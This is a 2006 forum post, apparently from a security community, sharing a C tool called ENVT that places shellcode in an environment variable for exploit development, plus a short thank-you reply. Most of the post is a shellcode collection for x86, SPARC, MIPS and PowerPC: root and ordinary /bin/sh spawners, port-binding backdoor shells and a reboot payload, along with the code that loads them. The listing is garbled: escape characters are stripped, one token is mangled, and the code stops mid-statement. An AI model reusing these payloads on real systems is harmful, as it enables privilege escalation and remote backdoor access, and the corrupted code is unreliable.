darkking Posted September 18, 2006 Report Share Posted September 18, 2006 Tool for Linux , (*nix) .. it support pcc , sparc , mips , x86 procs ,this tool injects shellcodes into linux environment and uses these shellcodesfor exploit developing , maybe IDS detections or testing and other stuff ....[ SIGINT , SIGHUP , SIGABRT handlers added ]/** Qnix <Qnix@bsdmail.org>* ENVT v0.01** */#include <stdio.h>#include <stdlib.h>#include <unistd.h>#include <string.h>#define VERSION "v0.1"#define MAX_SIZE 1024#define SHSIZE 512#define bash "/bin/bash"/* Prototype */void getenvaddr(char *environment);void help(char *string);void setshenv(int shellcode);/****************** START OF SHELLCODES ******************/char execve_binbash[] ="x31xc0" // xor %eax, %eax"x50" // push %eax"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x50" // push %eax"x53" // push %ebx"x89xe1" // mov %esp, %ecx"x31xd2" // xor %edx, %edx"xb0x0b" // mov $0xb, %al"xcdx80"; // int $0x80char execve_setuid_setgid_bb[] ="x6ax17" // push $0x17"x58" // pop %eax"x31xdb" // xor %ebx, %ebx"xcdx80" // int $0x80"x6ax2e" // push $0x2e"x58" // pop %eax"x53" // push %ebx"xcdx80" // int $0x80"x31xd2" // xor %edx, %edx"x6ax0b" // push $0xb"x58" // pop %eax"x52" // push %edx"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x52" // push %edx"x53" // push %ebx"x89xe1" // mov %esp, %ecx"xcdx80"; // int $0x80char portbind_64713[] =/* socket(AF_INET, SOCK_STREAM, 0) */"x6ax66" // push $0x66"x58" // pop %eax"x6ax01" // push $0x1"x5b" // pop %ebx"x99" // cltd"x52" // push %edx"x53" // push %ebx"x6ax02" // push $0x2"x89xe1" // mov %esp,%ecx"xcdx80" // int $0x80/* bind(s, server, sizeof(server)) */"x52" // push %edx"x66x68xfcxc9" // pushw $0xc9fc // PORT = 64713"x66x6ax02" // pushw $0x2"x89xe1" // mov $esp,%ecx"x6ax10" // push $0x10"x51" // push %ecx"x50" // push %eax"x89xe1" // mov %esp,%ecx"x89xc6" // mov %eax,%esi"x43" // inc 
%ebx"xb0x66" // mov $0x66,%al"xcdx80" // int $0x80/* listen(s, anything) */"xb0x66" // mov $0x66,%al"xd1xe3" // shl %ebx"xcdx80" // int $0x80/* accept(s, 0, 0) */"x52" // push %edx"x56" // push %esi"x89xe1" // mov %esp,%ecx"x43" // inc %ebx"xb0x66" // mov $0x66,%al"xcdx80" // int $0x80"x93" // xchg %eax,%ebx/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */"x6ax02" // push $0x2"x59" // pop %ecx"xb0x3f" // mov $0x3f,%al"xcdx80" // int $0x80"x49" // dec %ecx"x79xf9" // jns dup_loop/* execve("/bin/sh", ["/bin/sh"], NULL) */"x6ax0b" // push $0xb"x58" // pop %eax"x52" // push %edx"x68x2fx2fx73x68" // push $0x68732f2f"x68x2fx62x69x6e" // push $0x6e69622f"x89xe3" // mov %esp, %ebx"x52" // push %edx"x53" // push %ebx"x89xe1" // mov %esp, %ecx"xcdx80"; // int $0x80char reboot_20[] ="x6ax58" // push $0x58"x58" // pop %eax"xbbxadxdexe1xfe" // mov $0xfee1dead,%ebx"xb9x69x19x12x28" // mov $0x28121969,%ecx"xbax67x45x23x01" // mov $0x1234567,%edx"xcdx80"; // int $0x80char sparc_portbind[]="x9dxe3xbfx78" // save %sp, -136, %sp"x90x10x20x02" // mov 2, %o0"x92x10x20x01" // mov 1, %o1"x94x22x80x0a" // sub %o2, %o2, %o2"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x01" // mov 1, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x27xbfxf4" // st %o0, [ %fp + -12 ]"x90x10x20x02" // mov 2, %o0"xd0x37xbfxd8" // sth %o0, [ %fp + -40 ]"x13x08xc8xc8" // sethi %hi(0x23232000), %o1"x90x12x63x0f" // or %o1, 0x30f, %o0"xd0x37xbfxda" // sth %o0, [ %fp + -38 ]"xc0x27xbfxdc" // clr [ %fp + -36 ]"x92x07xbfxd8" // add %fp, -40, %o1"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0"x94x10x20x10" // mov 0x10, %o2"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x02" // mov 2, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf4" // ld [ %fp + -12 ], 
%o0"x92x10x20x05" // mov 5, %o1"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"x90x10x20x04" // mov 4, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"x92x07xbfxd8" // add %fp, -40, %o1"x94x07xbfxec" // add %fp, -20, %o2"xd0x07xbfxf4" // ld [ %fp + -12 ], %o0"xd0x23xa0x44" // st %o0, [ %sp + 0x44 ]"xd2x23xa0x48" // st %o1, [ %sp + 0x48 ]"xd4x23xa0x4c" // st %o2, [ %sp + 0x4c ]"x90x10x20x05" // mov 5, %o0"x92x03xa0x44" // add %sp, 0x44, %o1"x82x10x20xce" // mov 0xce, %g1"x91xd0x20x10" // ta 0x10"xd0x27xbfxf0" // st %o0, [ %fp + -16 ]"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x22x40x09" // sub %o1, %o1, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x10x20x01" // mov 1, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"xd0x07xbfxf0" // ld [ %fp + -16 ], %o0"x92x10x20x02" // mov 2, %o1"x82x10x20x5a" // mov 0x5a, %g1"x91xd0x20x10" // ta 0x10"x2dx0bxd8x9a" // sethi %hi(0x2f626800), %l6"xacx15xa1x6e" // or %l6, 0x16e, %l6"x2fx0bxdcxda" // sethi %hi(0x2f736800), %l7"x90x0bx80x0e" // and %sp, %sp, %o0"x92x03xa0x08" // add %sp, 8, %o1"x94x22x80x0a" // sub %o2, %o2, %o2"x9cx03xa0x10" // add %sp, 0x10, %sp"xecx3bxbfxf0" // std %l6, [ %sp + -16 ]"xd0x23xbfxf8" // st %o0, [ %sp + -8 ]"xc0x23xbfxfc" // clr [ %sp + -4 ]"x82x10x20x3b" // mov 0x3b, %g1"x91xd0x20x10"; // ta 0x10char mips_sh[] =/* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */"xffxffx10x04xabx0fx02x24""x55xf0x46x20x66x06xffx23""xc2xf9xecx23x66x06xbdx23""x9axf9xacxafx9exf9xa6xaf""x9axf9xbdx23x21x20x80x01""x21x28xa0x03xccxcdx44x03""/bin/sh";char ppc_sh[] ="x7cx3fx0bx78" /*mr r31,r1*/"x7cxa5x2ax79" /*xor. 
r5,r5,r5*/"x42x40xffxf9" /*bdzl+ 10000454<main>*/
"x7fx08x02xa6" /*mflr r24*/
"x3bx18x01x34" /*addi r24,r24,308*/
"x98xb8xfexfb" /*stb r5,-261(r24)*/
"x38x78xfexf4" /*addi r3,r24,-268*/
"x90x61xffxf8" /*stw r3,-8(r1)*/
"x38x81xffxf8" /*addi r4,r1,-8*/
"x90xa1xffxfc" /*stw r5,-4(r1)*/
"x3bxc0x01x60" /*li r30,352*/
"x7fxc0x2ex70" /*srawi r0,r30,5*/
"x44xdexadxf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL
/****************** END OF SHELLCODES ******************/

/*
 * Program entry point: option parsing only, everything else is delegated
 * to the helpers below.  If ENVT is already present in the environment,
 * its address is reported via getenvaddr() and the program exits.
 *
 * NOTE(review): this listing was flattened when the post was extracted;
 * the backslashes of string escapes appear to have been stripped, so the
 * trailing "n" / "ttt" in the message strings below presumably read "\n"
 * / "\t\t\t" in the original source, and the bare inner quotes in
 * shellcode_list() presumably read \".  Confirm against the original
 * before relying on any of these strings.
 */
int main(int argc, char *argv[]) {
    int c;
    char buf1[MAX_SIZE];         /* copy of the -s operand; no initializer, see the 's' case */
    char *addr = getenv("ENVT");
    int buf1i;
    extern char *optarg;
    extern int optind, optopt;   /* optind is declared here but never read */

    /* ENVT already set: report where the string lives and stop. */
    if(addr != NULL) {
        getenvaddr(addr);
        exit(0);
    }
    if(argc < 2) {
        help(argv[0]);           /* help() calls exit(0), so control never returns here */
    }
    while((c = getopt(argc, argv, ":s:lhv")) != -1) {
        /* NOTE(review): rendered as "switch©" on the page; in context this
           reads as switch(c) over the getopt result -- confirm. */
        switch© {
            /* version() and shellcode_list() are not in the prototype list at
               the top of the file and are defined after this function, so
               these calls rely on implicit declaration (rejected by C99+). */
            case 'v': version(); break;
            case 'h': help(argv[0]);
            /* no break: help() exits, so falling into 'l' is unreachable */
            case 'l': shellcode_list(); break;
            case 's':
                /* NOTE(review): strncpy() does not NUL-terminate when optarg is
                   MAX_SIZE-1 bytes or longer, and buf1 has no initializer, so
                   atoi() may read past the copied bytes.  atoi() also reports
                   no errors and accepts negative values; the only range check
                   visible in setshenv() is "shellcode >= 8".  Preferred:
                   strtol(optarg, &end, 10) with end/errno checks, or
                   snprintf(buf1, sizeof buf1, "%s", optarg) before atoi(). */
                strncpy(buf1,optarg,MAX_SIZE-1);
                buf1i = atoi(buf1);
                setshenv(buf1i);
                break;
            case ':':
                fprintf(stderr,"Option -%c requires an operandn",optopt);
                break;
            /* no default: getopt's '?' (unknown option) is silently ignored */
        }
    }
    return(0);
}

/*
 * Display version .
 *
 * Prints the VERSION string and the author line to stdout, then exits with
 * status 0; the int return type is never used by callers.
 */
int version() {
    fprintf(stdout,"ENVT %sn",VERSION);
    fprintf(stdout,"Coded by Qnix <Qnix@bsdmail.org>n");
    exit(0);
}

/*
 * Report the address of the ENVT value found in the environment.
 *
 * @param environment  pointer returned by getenv("ENVT"); only the
 *                     address is printed (%p), the contents are not read.
 */
void getenvaddr(char *environment) {
    fprintf(stdout,"SHELLCODE FOUND IN %pn",environment);
}

/*
 * Display help .
 *
 * @param string  argv[0], echoed in the usage line.  Writes to stderr and
 *                exits with status 0 -- callers in main() rely on it not
 *                returning.
 */
void help(char *string) {
    fprintf(stderr,"Usage : %sn-l:(shellcode-list)n-s:<shellcode-number>n-h:(help)n-v:(version)n",string);
    exit(0);
}

/*
 * Display shellcode list .
 *
 * Prints the numbered catalogue that -s selects from and exits; the int
 * return type is never used.  The last fprintf() string is continued on
 * the next line of the page (extraction split), not a deliberate break.
 */
int shellcode_list() {
    fprintf(stdout,"nttt::[ LINUX/x86 ]::n");
    fprintf(stdout,"1) linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");
    fprintf(stdout,"2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytesn");
    fprintf(stdout,"3) linux/x86 portbind (port 64713) 86 bytesn");
    fprintf(stdout,"4) linux/x86 reboot() - 20 bytesnn");
    fprintf(stdout,"ttt::[ LINUX/SPARC ]::n");
    fprintf(stdout,"5) linux/SPARC portbind port 8975 284 bytesnn");
    fprintf(stdout,"ttt::[ LINUX/MIPS ]::n");
    fprintf(stdout,"6) linux/mips execve /bin/sh 56 
bytesnn");fprintf(stdout,"ttt::[ LINUX/PPC ]::n");fprintf(stdout,"7) linux/ppc execve /bin/sh 60 bytesnn");exit(0);}/** Set Shellcode in environment .** */void setshenv(int shellcode) {char *addr = getenv("ENVT"); // Use to get shellcode addrchar execvebb[sHSIZE]; // Use for shellcode(1)char setugbb[sHSIZE]; // Use for shellcode(2)char portbind[sHSIZE]; // Use for shellcode(3)char reboot[sHSIZE]; // Use for shellcode(4)char sparc1[sHSIZE]; // Use for shellcode(5)char mips1[sHSIZE]; // Use for shellcode(6)char ppc1[sHSIZE]; // Use for shellcode(7)if(shellcode >= 8) {fprintf(stderr,"Error : shellcode number %d unavailable type -l to viewnthe available shellcodes.n",shellcode);exit(0);}/* Shellcode number 1 */if(shellcode == 1) {fprintf(stdout,"Shellcode: Linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytesn");fprintf(stdout,"[+]t Setting memory for the shellcode .n");memset(execvebb,0x90,SHSIZE);fprintf(stdout,"[+]t Copying shellcode to memory .n");memcpy(&execvebb[sHSIZE-strlen(execve_binbash)], execve_binbash, strlen(execve_binbash));memcpy(execvebb,"ENVT=",5);fprintf(stdout,"[+]t Putting shellcode in the environment .n");putenv(execvebb);fprintf(stdout,"[+]t Going into the environment (ENVT) and exiting ....nDone %d bytes loaded to (ENVT)n",strlen(execve_binbash));execl(bash, bash, ' Quote Link to comment Share on other sites More sharing options...
DarkWizzard, September 18, 2006: Frumos. Foarte fain. Multumesc.